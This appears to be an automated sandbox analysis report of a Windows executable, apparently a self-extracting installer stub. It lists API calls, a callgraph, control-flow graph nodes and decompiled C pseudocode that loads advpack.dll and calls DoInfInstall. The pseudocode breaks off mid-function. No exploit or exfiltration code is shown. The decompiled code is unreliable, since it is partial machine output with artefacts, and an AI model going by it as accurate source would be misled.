2868->2870 2871 175ba1 memset 2869->2871 2872 175a21 MulDiv 2869->2872 2873 1744b9 20 API calls 2870->2873 2874 176285 GetLastError 2871->2874 2872->2871 2875 175a50 GetVolumeInformationA 2872->2875 2876 1759cc 2873->2876 2877 175bbc GetLastError FormatMessageA 2874->2877 2878 175ab5 SetCurrentDirectoryA 2875->2878 2879 175a6e memset 2875->2879 2880 176285 GetLastError 2876->2880 2881 175be3 2877->2881 2889 175acc 2878->2889 2882 176285 GetLastError 2879->2882 2887 1759d1 2880->2887 2883 1744b9 20 API calls 2881->2883 2884 175a89 GetLastError FormatMessageA 2882->2884 2885 175bf5 SetCurrentDirectoryA 2883->2885 2884->2881 2885->2887 2886 176ce0 4 API calls 2888 175c11 2886->2888 2887->2886 2888->2696 2890 175b0a 2889->2890 2892 175b20 2889->2892 2891 1744b9 20 API calls 2890->2891 2891->2887 2892->2887 2917 17268b 2892->2917 2896 1753bf 2894->2896 2895 17171e _vsnprintf 2895->2896 2896->2895 2897 17658a CharPrevA 2896->2897 2900 175415 GetTempFileNameA 2896->2900 2898 1753fa RemoveDirectoryA GetFileAttributesA 2897->2898 2898->2896 2899 17544f CreateDirectoryA 2898->2899 2899->2900 2901 17543a 2899->2901 2900->2901 2902 175429 DeleteFileA CreateDirectoryA 2900->2902 2903 176ce0 4 API calls 2901->2903 2902->2901 2904 175449 2903->2904 2904->2841 2906 1758d8 2905->2906 2906->2906 2907 1758df LocalAlloc 2906->2907 2908 1758f3 2907->2908 2909 175919 2907->2909 2910 1744b9 20 API calls 2908->2910 2912 17658a CharPrevA 2909->2912 2911 175906 2910->2911 2913 176285 GetLastError 2911->2913 2915 175534 2911->2915 2914 175931 CreateFileA LocalFree 2912->2914 2913->2915 2914->2911 2916 17595b CloseHandle GetFileAttributesA 2914->2916 2915->2843 2915->2844 2916->2911 2918 1726e5 2917->2918 2919 1726b9 2917->2919 2920 17271f 2918->2920 2921 1726ea 2918->2921 2922 17171e _vsnprintf 2919->2922 2924 1726e3 2920->2924 2927 17171e _vsnprintf 2920->2927 2923 17171e _vsnprintf 2921->2923 2925 1726cc 2922->2925 2926 1726fd 2923->2926 2928 176ce0 4 API calls 2924->2928 2929 1744b9 20 API calls 2925->2929 2930 1744b9 20 API calls 2926->2930 2931 172735 2927->2931 2932 17276d 2928->2932 2929->2924 2930->2924 2933 1744b9 20 API calls 2931->2933 2932->2887 2933->2924 2935 17468f 7 API calls 2934->2935 2936 174ff5 FindResourceA LoadResource LockResource 2935->2936 2937 175020 2936->2937 2949 17515f 2936->2949 2938 175057 2937->2938 2939 175029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2937->2939 2953 174efd 2938->2953 2939->2938 2942 175060 2944 1744b9 20 API calls 2942->2944 2943 17507c 2945 1744b9 20 API calls 2943->2945 2950 175075 2943->2950 2944->2950 2945->2950 2946 175110 FreeResource 2947 17511d 2946->2947 2948 17513a 2947->2948 2951 1744b9 20 API calls 2947->2951 2948->2949 2952 17514c SendMessageA 2948->2952 2949->2737 2950->2946 2950->2947 2951->2948 2952->2949 2954 174f4a 2953->2954 2955 174980 25 API calls 2954->2955 2960 174fa1 2954->2960 2958 174f67 2955->2958 2956 176ce0 4 API calls 2957 174fc6 2956->2957 2957->2942 2957->2943 2959 174b60 FindCloseChangeNotification 2958->2959 2958->2960 2959->2960 2960->2956 2962 172510 2961->2962 2963 17255b 2961->2963 2964 17658a CharPrevA 2962->2964 2965 176ce0 4 API calls 2963->2965 2966 172522 WritePrivateProfileStringA _lopen 2964->2966 2967 172569 2965->2967 2966->2963 2968 172548 _llseek _lclose 2966->2968 2967->2746 2968->2963 2970 171b25 2969->2970 3074 171a84 2970->3074 2972 171b57 2973 17658a CharPrevA 2972->2973 2975 171b8c 2972->2975 2973->2975 2974 1766c8 2 API calls 2976 171bd1 2974->2976 2975->2974 2977 171d73 2976->2977 2978 171bd9 CompareStringA 2976->2978 2980 1766c8 2 API calls 2977->2980 2978->2977 2979 171bf7 GetFileAttributesA 2978->2979 2981 171d53 2979->2981 2982 171c0d 2979->2982 2983 171d7d 2980->2983 2984 171d64 2981->2984 2982->2981 2989 171a84 2 API calls 2982->2989 2985 171d81 CompareStringA 2983->2985 2986 171df8 LocalAlloc 2983->2986 2987 1744b9 20 API calls 2984->2987 2985->2986 2994 171d9b 2985->2994 2986->2984 2988 171e0b GetFileAttributesA 2986->2988 2990 171d6c 2987->2990 2991 171e1d 2988->2991 3008 171e45 2988->3008 2992 171c31 2989->2992 2996 176ce0 4 API calls 2990->2996 2991->3008 2993 171c50 LocalAlloc 2992->2993 2998 171a84 2 API calls 2992->2998 2993->2984 2995 171c67 GetPrivateProfileIntA GetPrivateProfileStringA 2993->2995 2994->2994 2997 171dbe LocalAlloc 2994->2997 3003 171cf8 2995->3003 3007 171cc2 2995->3007 3001 171ea1 2996->3001 2997->2984 3002 171de1 2997->3002 2998->2993 3001->2768 3004 17171e _vsnprintf 3002->3004 3005 171d23 3003->3005 3006 171d09 GetShortPathNameA 3003->3006 3004->3007 3009 17171e _vsnprintf 3005->3009 3006->3005 3007->2990 3080 172aac 3008->3080 3009->3007 3011 17209a 3010->3011 3019 172256 3010->3019 3014 17171e _vsnprintf 3011->3014 3016 1720dc 3011->3016 3012 176ce0 4 API calls 3013 172263 3012->3013 3013->2768 3015 1720af RegQueryValueExA 3014->3015 3015->3011 3015->3016 3017 1720e4 RegCloseKey 3016->3017 3018 1720fb GetSystemDirectoryA 3016->3018 3017->3019 3020 17658a CharPrevA 3018->3020 3019->3012 3021 17211b LoadLibraryA 3020->3021 3022 17212e GetProcAddress FreeLibrary 3021->3022 3023 172179 GetModuleFileNameA 3021->3023 3022->3023 3024 17214e GetSystemDirectoryA 3022->3024 3025 1721de RegCloseKey 3023->3025 3028 172177 3023->3028 3026 172165 3024->3026 3024->3028 3025->3019 3027 17658a CharPrevA 3026->3027 3027->3028 3028->3028 3029 1721b7 LocalAlloc 3028->3029 3030 1721cd 3029->3030 3031 1721ec 3029->3031 3032 1744b9 20 API calls 3030->3032 3033 17171e _vsnprintf 3031->3033 3032->3025 3034 172218 RegSetValueExA RegCloseKey LocalFree 3033->3034 3034->3019 3037 174016 CreateProcessA 3036->3037 3049 174106 3036->3049 3038 1740c4 3037->3038 3039 174041 WaitForSingleObject GetExitCodeProcess 3037->3039 3041 176285 GetLastError 3038->3041 3042 174070 3039->3042 3040 176ce0 4 API calls 3043 174117 3040->3043 3045 1740c9 GetLastError FormatMessageA 3041->3045 3107 17411b 3042->3107 3043->2768 3047 1744b9 20 API calls 3045->3047 3046 174096 CloseHandle CloseHandle 3048 1740ba 3046->3048 3046->3049 3047->3049 3048->3049 3049->3040 3051 1764c2 3050->3051 3052 17658a CharPrevA 3051->3052 3053 1764d8 GetFileAttributesA 3052->3053 3054 176501 LoadLibraryA 3053->3054 3055 1764ea 3053->3055 3057 176508 3054->3057 3055->3054 3056 1764ee LoadLibraryExA 3055->3056 3056->3057 3058 176ce0 4 API calls 3057->3058 3059 176513 3058->3059 3059->2785 3061 172381 3060->3061 3062 172289 RegOpenKeyExA 3060->3062 3064 176ce0 4 API calls 3061->3064 3062->3061 3063 1722b1 RegQueryValueExA 3062->3063 3065 1722e6 memset GetSystemDirectoryA 3063->3065 3066 172374 RegCloseKey 3063->3066 3067 17238c 3064->3067 3068 172321 3065->3068 3069 17230f 3065->3069 3066->3061 3067->2763 3071 17171e _vsnprintf 3068->3071 3070 17658a CharPrevA 3069->3070 3070->3068 3072 17233f RegSetValueExA 3071->3072 3072->3066 3075 171a9a 3074->3075 3077 171aba 3075->3077 3078 171aaf 3075->3078 3093 17667f 3075->3093 3077->2972 3078->3077 3079 17667f 2 API calls 3078->3079 3079->3078 3081 172ad4 GetModuleFileNameA 3080->3081 3082 172be6 3080->3082 3092 172b02 3081->3092 3083 176ce0 4 API calls 3082->3083 3085 172bf5 3083->3085 3084 172af1 IsDBCSLeadByte 3084->3092 3085->2990 3086 172b11 CharNextA CharUpperA 3088 172b8d CharUpperA 3086->3088 3086->3092 3087 172bca CharNextA 3089 172bd3 CharNextA 3087->3089 3088->3092 3089->3092 3091 172b43 CharPrevA 3091->3092 3092->3082 3092->3084 3092->3086 3092->3087 3092->3089 3092->3091 3098 1765e8 3092->3098 3094 176689 3093->3094 3095 176648 IsDBCSLeadByte 3094->3095 3096 176697 CharNextA 3094->3096 3097 1766a5 3094->3097 3095->3094 3096->3094 3097->3075 3099 1765f4 3098->3099 3099->3099 3100 1765fb CharPrevA 3099->3100 3101 176611 CharPrevA 3100->3101 3102 17661e 3101->3102 3103 17660b 3101->3103 3104 17663d 3102->3104 3105 176627 CharPrevA 3102->3105 3106 176634 CharNextA 3102->3106 3103->3101 3103->3102 3104->3092 3105->3104 3105->3106 3106->3104 3108 174132 3107->3108 3110 17412a 3107->3110 3111 171ea7 3108->3111 3110->3046 3112 171eba 3111->3112 3113 171ed3 3111->3113 3114 17256d 15 API calls 3112->3114 3113->3110 3114->3113 3116 172026 3115->3116 3117 171ff0 RegOpenKeyExA 3115->3117 3116->2479 3117->3116 3118 17200f RegDeleteValueA RegCloseKey 3117->3118 3118->3116 3266 176a20 __getmainargs 3267 1719e0 3268 171a24 GetDesktopWindow 3267->3268 3271 171a03 3267->3271 3269 1743d0 11 API calls 3268->3269 3273 171a33 LoadStringA SetDlgItemTextA MessageBeep 3269->3273 3270 171a20 3274 176ce0 4 API calls 3270->3274 3271->3270 3272 171a16 EndDialog 3271->3272 3272->3270 3273->3270 3275 171a7e 3274->3275 3276 176bef _XcptFilter

                                                                                                                                                                                                    Callgraph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    • Opacity -> Relevance
                                                                                                                                                                                                    • Disassembly available
                                                                                                                                                                                                    callgraph 0 Function_00175C17 1 Function_00176517 72 Function_001744B9 1->72 2 Function_00173210 21 Function_00174224 2->21 38 Function_0017597D 2->38 66 Function_0017658A 2->66 2->72 87 Function_001743D0 2->87 93 Function_001758C8 2->93 3 Function_00177010 4 Function_0017681F 102 Function_001766F9 4->102 107 Function_00176CE0 4->107 5 Function_0017171E 6 Function_0017621E 6->38 57 Function_00176285 6->57 6->72 6->107 7 Function_00172F1D 7->6 18 Function_00173A3F 7->18 20 Function_00173B26 7->20 42 Function_00175164 7->42 47 Function_0017256D 7->47 49 Function_00174169 7->49 7->57 7->66 7->72 76 Function_00173BA2 7->76 80 Function_001755A0 7->80 103 Function_001751E5 7->103 7->107 8 Function_0017411B 73 Function_00171EA7 8->73 9 Function_00176C03 32 Function_0017724D 9->32 10 Function_00174702 61 Function_00171680 10->61 69 Function_001716B3 10->69 11 Function_00177000 12 Function_00174200 13 Function_00173100 13->87 14 Function_0017490C 15 Function_00177208 16 Function_00174C37 17 Function_00172630 17->72 17->107 18->1 18->57 64 Function_0017468F 18->64 18->72 19 Function_00176C3F 20->1 56 Function_00176298 20->56 105 Function_00174FE0 20->105 21->61 21->72 22 Function_00177120 23 Function_00176A20 24 Function_00176E2A 96 Function_00176CF0 24->96 25 Function_0017202A 25->5 25->66 25->72 25->107 26 Function_00177155 27 Function_00176F54 27->15 27->32 28 Function_00176952 29 Function_00173450 29->87 30 Function_00174A50 31 Function_00176F40 33 Function_00176648 34 Function_00172773 59 Function_00171781 34->59 34->61 34->66 34->107 35 Function_00177270 36 Function_00176C70 37 Function_0017667F 37->33 38->57 65 Function_0017268B 38->65 38->72 38->107 39 Function_0017487A 39->14 40 Function_00175467 40->38 40->57 40->59 40->61 40->66 78 Function_001753A1 40->78 40->93 40->107 41 Function_00172267 41->5 41->66 41->107 42->56 42->64 42->72 43 Function_00174B60 44 Function_00176A60 44->15 44->19 44->26 44->32 45 Function_00177060 44->45 101 Function_00172BFB 44->101 45->3 45->22 46 Function_00176760 106 Function_001724E0 47->106 48 Function_0017476D 48->1 82 Function_001766AE 48->82 49->64 49->72 50 Function_00176495 50->59 50->66 50->107 51 Function_00176793 52 Function_00172390 52->52 52->61 52->66 52->69 52->107 53 Function_00171F90 53->72 53->73 53->107 54 Function_00175C9E 54->0 54->24 54->37 54->61 54->66 54->72 94 Function_001766C8 54->94 54->107 108 Function_001731E0 54->108 55 Function_00174E99 55->61 56->5 56->107 58 Function_00171A84 58->37 60 Function_00174980 60->39 60->72 61->59 62 Function_00173680 63 Function_00176380 65->5 65->72 65->107 66->69 67 Function_00172A89 68 Function_001752B6 68->52 68->59 104 Function_00171FE1 68->104 68->107 119 Function_001765E8 68->119 69->59 70 Function_001769B0 70->11 70->36 71 Function_00176FBE 70->71 112 Function_001771EF 70->112 71->27 72->4 72->5 72->61 92 Function_001767C9 72->92 72->107 73->47 74 Function_00176FA5 74->32 75 Function_001718A3 75->107 115 Function_001717EE 75->115 76->25 76->41 76->50 76->57 76->59 76->64 76->72 76->107 111 Function_00173FEF 76->111 117 Function_00171AE8 76->117 77 Function_001772A2 78->5 78->61 78->66 78->107 79 Function_00176FA1 80->1 80->17 80->28 80->38 80->40 80->57 80->59 80->64 80->66 80->72 80->107 81 Function_00174CA0 83 Function_00172AAC 83->61 95 Function_001717C8 83->95 83->107 83->119 84 Function_00172CAA 84->1 84->52 84->54 84->64 84->72 84->75 84->107 114 Function_001736EE 84->114 85 Function_00174AD0 85->62 86 Function_00174CD0 86->10 86->16 86->43 86->48 86->55 86->60 86->107 109 Function_001747E0 86->109 87->107 88 Function_00174CC0 89 Function_00174BC0 90 Function_001730C0 91 Function_001763C0 91->59 91->66 91->107 92->51 93->57 93->61 93->66 93->72 94->33 97 Function_001734F0 97->62 97->72 97->87 98 Function_00176EF0 99 Function_001770FE 100 Function_00174EFD 100->43 100->60 100->107 101->7 101->53 101->68 101->84 103->57 103->64 103->72 105->64 105->72 105->100 106->66 106->107 107->96 109->61 109->72 110 Function_001719E0 110->87 110->107 111->8 111->57 111->72 111->107 113 Function_00176BEF 114->4 114->67 114->72 114->92 114->107 118 Function_001728E8 114->118 115->107 116 Function_001770EB 117->5 117->58 117->59 117->61 117->66 117->69 117->72 117->83 117->94 117->107 118->34 118->67

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 36 173ba2-173bd9 37 173bfd-173bff 36->37 38 173bdb-173bee call 17468f 36->38 39 173c03-173c28 memset 37->39 44 173bf4-173bf7 38->44 45 173d13-173d30 call 1744b9 38->45 41 173d35-173d48 call 171781 39->41 42 173c2e-173c40 call 17468f 39->42 48 173d4d-173d52 41->48 42->45 53 173c46-173c49 42->53 44->37 44->45 55 173f4d 45->55 51 173d54-173d6c call 17468f 48->51 52 173d9e-173db6 call 171ae8 48->52 51->45 65 173d6e-173d75 51->65 52->55 69 173dbc-173dc2 52->69 53->45 57 173c4f-173c56 53->57 59 173f4f-173f63 call 176ce0 55->59 61 173c60-173c65 57->61 62 173c58-173c5e 57->62 67 173c67-173c6d 61->67 68 173c75-173c7c 61->68 66 173c6e-173c73 62->66 71 173d7b-173d98 CompareStringA 65->71 72 173fda-173fe1 65->72 73 173c87-173c89 66->73 67->66 68->73 76 173c7e-173c82 68->76 74 173de6-173de8 69->74 75 173dc4-173dce 69->75 71->52 71->72 79 173fe3 call 172267 72->79 80 173fe8-173fea 72->80 73->48 82 173c8f-173c98 73->82 77 173dee-173df5 74->77 78 173f0b-173f15 call 173fef 74->78 75->74 81 173dd0-173dd7 75->81 76->73 85 173fab-173fd2 call 1744b9 LocalFree 77->85 86 173dfb-173dfd 77->86 95 173f1a-173f1c 78->95 79->80 80->59 81->74 89 173dd9-173ddb 81->89 83 173cf1-173cf3 82->83 84 173c9a-173c9c 82->84 83->52 94 173cf9-173d11 call 17468f 83->94 91 173ca5-173ca7 84->91 92 173c9e-173ca3 84->92 85->55 86->78 93 173e03-173e0a 86->93 89->77 96 173ddd-173de1 call 17202a 89->96 91->55 100 173cad 91->100 99 173cb2-173cc5 call 17468f 92->99 93->78 101 173e10-173e19 call 176495 93->101 94->45 94->48 103 173f46-173f47 LocalFree 95->103 104 173f1e-173f2d LocalFree 95->104 96->74 99->45 112 173cc7-173ce8 CompareStringA 99->112 100->99 113 173f92-173fa9 call 1744b9 101->113 114 173e1f-173e36 GetProcAddress 101->114 103->55 108 173fd7-173fd9 104->108 109 173f33-173f3b 104->109 108->72 109->39 112->83 115 173cea-173ced 112->115 126 173f7c-173f90 LocalFree call 176285 113->126 116 173f64-173f76 call 1744b9 FreeLibrary 114->116 117 173e3c-173e80 114->117 115->83 116->126 120 173e82-173e87 117->120 121 173e8b-173e94 117->121 120->121 124 173e96-173e9b 121->124 125 173e9f-173ea2 121->125 124->125 128 173ea4-173ea9 125->128 129 173ead-173eb6 125->129 126->55 128->129 130 173ec1-173ec3 129->130 131 173eb8-173ebd 129->131 133 173ec5-173eca 130->133 134 173ece-173eec 130->134 131->130 133->134 137 173ef5-173efd 134->137 138 173eee-173ef3 134->138 139 173f40 FreeLibrary 137->139 140 173eff-173f09 FreeLibrary 137->140 138->137 139->103 140->104
                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                    			E00173BA2() {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                    				char _v276;
                                                                                                                                                                                                    				char _v280;
                                                                                                                                                                                                    				short _v300;
                                                                                                                                                                                                    				intOrPtr _v304;
                                                                                                                                                                                                    				void _v348;
                                                                                                                                                                                                    				char _v352;
                                                                                                                                                                                                    				intOrPtr _v356;
                                                                                                                                                                                                    				signed int _v360;
                                                                                                                                                                                                    				short _v364;
                                                                                                                                                                                                    				char* _v368;
                                                                                                                                                                                                    				intOrPtr _v372;
                                                                                                                                                                                                    				void* _v376;
                                                                                                                                                                                                    				intOrPtr _v380;
                                                                                                                                                                                                    				char _v384;
                                                                                                                                                                                                    				signed int _v388;
                                                                                                                                                                                                    				intOrPtr _v392;
                                                                                                                                                                                                    				signed int _v396;
                                                                                                                                                                                                    				signed int _v400;
                                                                                                                                                                                                    				signed int _v404;
                                                                                                                                                                                                    				void* _v408;
                                                                                                                                                                                                    				void* _v424;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t69;
                                                                                                                                                                                                    				signed int _t76;
                                                                                                                                                                                                    				void* _t77;
                                                                                                                                                                                                    				signed int _t79;
                                                                                                                                                                                                    				short _t96;
                                                                                                                                                                                                    				signed int _t97;
                                                                                                                                                                                                    				intOrPtr _t98;
                                                                                                                                                                                                    				signed int _t101;
                                                                                                                                                                                                    				signed int _t104;
                                                                                                                                                                                                    				signed int _t108;
                                                                                                                                                                                                    				int _t112;
                                                                                                                                                                                                    				void* _t115;
                                                                                                                                                                                                    				signed char _t118;
                                                                                                                                                                                                    				void* _t125;
                                                                                                                                                                                                    				signed int _t127;
                                                                                                                                                                                                    				void* _t128;
                                                                                                                                                                                                    				struct HINSTANCE__* _t129;
                                                                                                                                                                                                    				void* _t130;
                                                                                                                                                                                                    				short _t137;
                                                                                                                                                                                                    				char* _t140;
                                                                                                                                                                                                    				signed char _t144;
                                                                                                                                                                                                    				signed char _t145;
                                                                                                                                                                                                    				signed int _t149;
                                                                                                                                                                                                    				void* _t150;
                                                                                                                                                                                                    				void* _t151;
                                                                                                                                                                                                    				signed int _t153;
                                                                                                                                                                                                    				void* _t155;
                                                                                                                                                                                                    				void* _t156;
                                                                                                                                                                                                    				signed int _t157;
                                                                                                                                                                                                    				signed int _t162;
                                                                                                                                                                                                    				signed int _t164;
                                                                                                                                                                                                    				void* _t165;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                                                                                                                                                    				_t69 =  *0x178004; // 0x4ffa21aa
                                                                                                                                                                                                    				_v8 = _t69 ^ _t164;
                                                                                                                                                                                                    				_t153 = 0;
                                                                                                                                                                                                    				 *0x179124 =  *0x179124 & 0;
                                                                                                                                                                                                    				_t149 = 0;
                                                                                                                                                                                                    				_v388 = 0;
                                                                                                                                                                                                    				_v384 = 0;
                                                                                                                                                                                                    				_t165 =  *0x178a28 - _t153; // 0x0
                                                                                                                                                                                                    				if(_t165 != 0) {
                                                                                                                                                                                                    					L3:
                                                                                                                                                                                                    					_t127 = 0;
                                                                                                                                                                                                    					_v392 = 0;
                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                    						_v400 = _v400 & 0x00000000;
                                                                                                                                                                                                    						memset( &_v348, 0, 0x44);
                                                                                                                                                                                                    						_t164 = _t164 + 0xc;
                                                                                                                                                                                                    						_v348 = 0x44;
                                                                                                                                                                                                    						if( *0x178c42 != 0) {
                                                                                                                                                                                                    							goto L26;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t146 =  &_v396;
                                                                                                                                                                                                    						_t115 = E0017468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                    						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                    							L25:
                                                                                                                                                                                                    							_t146 = 0x4b1;
                                                                                                                                                                                                    							E001744B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                    							 *0x179124 = 0x80070714;
                                                                                                                                                                                                    							goto L62;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							if(_v396 != 1) {
                                                                                                                                                                                                    								__eflags = _v396 - 2;
                                                                                                                                                                                                    								if(_v396 != 2) {
                                                                                                                                                                                                    									_t137 = 3;
                                                                                                                                                                                                    									__eflags = _v396 - _t137;
                                                                                                                                                                                                    									if(_v396 == _t137) {
                                                                                                                                                                                                    										_v304 = 1;
                                                                                                                                                                                                    										_v300 = _t137;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									goto L14;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_push(6);
                                                                                                                                                                                                    								_v304 = 1;
                                                                                                                                                                                                    								_pop(0);
                                                                                                                                                                                                    								goto L11;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_v304 = 1;
                                                                                                                                                                                                    								L11:
                                                                                                                                                                                                    								_v300 = 0;
                                                                                                                                                                                                    								L14:
                                                                                                                                                                                                    								if(_t127 != 0) {
                                                                                                                                                                                                    									L27:
                                                                                                                                                                                                    									_t155 = 1;
                                                                                                                                                                                                    									__eflags = _t127 - 1;
                                                                                                                                                                                                    									if(_t127 != 1) {
                                                                                                                                                                                                    										L31:
                                                                                                                                                                                                    										_t132 =  &_v280;
                                                                                                                                                                                                    										_t76 = E00171AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                    										__eflags = _t76;
                                                                                                                                                                                                    										if(_t76 == 0) {
                                                                                                                                                                                                    											L62:
                                                                                                                                                                                                    											_t77 = 0;
                                                                                                                                                                                                    											L63:
                                                                                                                                                                                                    											_pop(_t150);
                                                                                                                                                                                                    											_pop(_t156);
                                                                                                                                                                                                    											_pop(_t128);
                                                                                                                                                                                                    											return E00176CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t157 = _v404;
                                                                                                                                                                                                    										__eflags = _t149;
                                                                                                                                                                                                    										if(_t149 != 0) {
                                                                                                                                                                                                    											L37:
                                                                                                                                                                                                    											__eflags = _t157;
                                                                                                                                                                                                    											if(_t157 == 0) {
                                                                                                                                                                                                    												L57:
                                                                                                                                                                                                    												_t151 = _v408;
                                                                                                                                                                                                    												_t146 =  &_v352;
                                                                                                                                                                                                    												_t130 = _t151; // executed
                                                                                                                                                                                                    												_t79 = E00173FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                    												__eflags = _t79;
                                                                                                                                                                                                    												if(_t79 == 0) {
                                                                                                                                                                                                    													L61:
                                                                                                                                                                                                    													LocalFree(_t151);
                                                                                                                                                                                                    													goto L62;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												L58:
                                                                                                                                                                                                    												LocalFree(_t151);
                                                                                                                                                                                                    												_t127 = _t127 + 1;
                                                                                                                                                                                                    												_v396 = _t127;
                                                                                                                                                                                                    												__eflags = _t127 - 2;
                                                                                                                                                                                                    												if(_t127 >= 2) {
                                                                                                                                                                                                    													_t155 = 1;
                                                                                                                                                                                                    													__eflags = 1;
                                                                                                                                                                                                    													L69:
                                                                                                                                                                                                    													__eflags =  *0x178580;
                                                                                                                                                                                                    													if( *0x178580 != 0) {
                                                                                                                                                                                                    														E00172267();
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    													_t77 = _t155;
                                                                                                                                                                                                    													goto L63;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												_t153 = _v392;
                                                                                                                                                                                                    												_t149 = _v388;
                                                                                                                                                                                                    												continue;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											L38:
                                                                                                                                                                                                    											__eflags =  *0x178180;
                                                                                                                                                                                                    											if( *0x178180 == 0) {
                                                                                                                                                                                                    												_t146 = 0x4c7;
                                                                                                                                                                                                    												E001744B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                    												LocalFree(_v424);
                                                                                                                                                                                                    												 *0x179124 = 0x8007042b;
                                                                                                                                                                                                    												goto L62;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags = _t157;
                                                                                                                                                                                                    											if(_t157 == 0) {
                                                                                                                                                                                                    												goto L57;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags =  *0x179a34 & 0x00000004;
                                                                                                                                                                                                    											if(__eflags == 0) {
                                                                                                                                                                                                    												goto L57;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t129 = E00176495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                    											__eflags = _t129;
                                                                                                                                                                                                    											if(_t129 == 0) {
                                                                                                                                                                                                    												_t146 = 0x4c8;
                                                                                                                                                                                                    												E001744B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                    												L65:
                                                                                                                                                                                                    												LocalFree(_v408);
                                                                                                                                                                                                    												 *0x179124 = E00176285();
                                                                                                                                                                                                    												goto L62;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                    											_v404 = _t146;
                                                                                                                                                                                                    											__eflags = _t146;
                                                                                                                                                                                                    											if(_t146 == 0) {
                                                                                                                                                                                                    												_t146 = 0x4c9;
                                                                                                                                                                                                    												__eflags = 0;
                                                                                                                                                                                                    												E001744B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                    												FreeLibrary(_t129);
                                                                                                                                                                                                    												goto L65;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags =  *0x178a30;
                                                                                                                                                                                                    											_t151 = _v408;
                                                                                                                                                                                                    											_v384 = 0;
                                                                                                                                                                                                    											_v368 =  &_v280;
                                                                                                                                                                                                    											_t96 =  *0x179a40; // 0x3
                                                                                                                                                                                                    											_v364 = _t96;
                                                                                                                                                                                                    											_t97 =  *0x178a38 & 0x0000ffff;
                                                                                                                                                                                                    											_v380 = 0x179154;
                                                                                                                                                                                                    											_v376 = _t151;
                                                                                                                                                                                                    											_v372 = 0x1791e4;
                                                                                                                                                                                                    											_v360 = _t97;
                                                                                                                                                                                                    											if( *0x178a30 != 0) {
                                                                                                                                                                                                    												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                    												__eflags = _t97;
                                                                                                                                                                                                    												_v360 = _t97;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t144 =  *0x179a34; // 0x1
                                                                                                                                                                                                    											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                    											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                    												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                    												__eflags = _t97;
                                                                                                                                                                                                    												_v360 = _t97;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                    											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                    												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                    												__eflags = _t97;
                                                                                                                                                                                                    												_v360 = _t97;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t145 =  *0x178d48; // 0x0
                                                                                                                                                                                                    											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                    											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                    												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                    												__eflags = _t97;
                                                                                                                                                                                                    												_v360 = _t97;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags = _t145;
                                                                                                                                                                                                    											if(_t145 < 0) {
                                                                                                                                                                                                    												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                    												__eflags = _t104;
                                                                                                                                                                                                    												_v360 = _t104;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t98 =  *0x179a38; // 0x0
                                                                                                                                                                                                    											_v356 = _t98;
                                                                                                                                                                                                    											_t130 = _t146;
                                                                                                                                                                                                    											 *0x17a288( &_v384);
                                                                                                                                                                                                    											_t101 = _v404();
                                                                                                                                                                                                    											__eflags = _t164 - _t164;
                                                                                                                                                                                                    											if(_t164 != _t164) {
                                                                                                                                                                                                    												_t130 = 4;
                                                                                                                                                                                                    												asm("int 0x29");
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											 *0x179124 = _t101;
                                                                                                                                                                                                    											_push(_t129);
                                                                                                                                                                                                    											__eflags = _t101;
                                                                                                                                                                                                    											if(_t101 < 0) {
                                                                                                                                                                                                    												FreeLibrary();
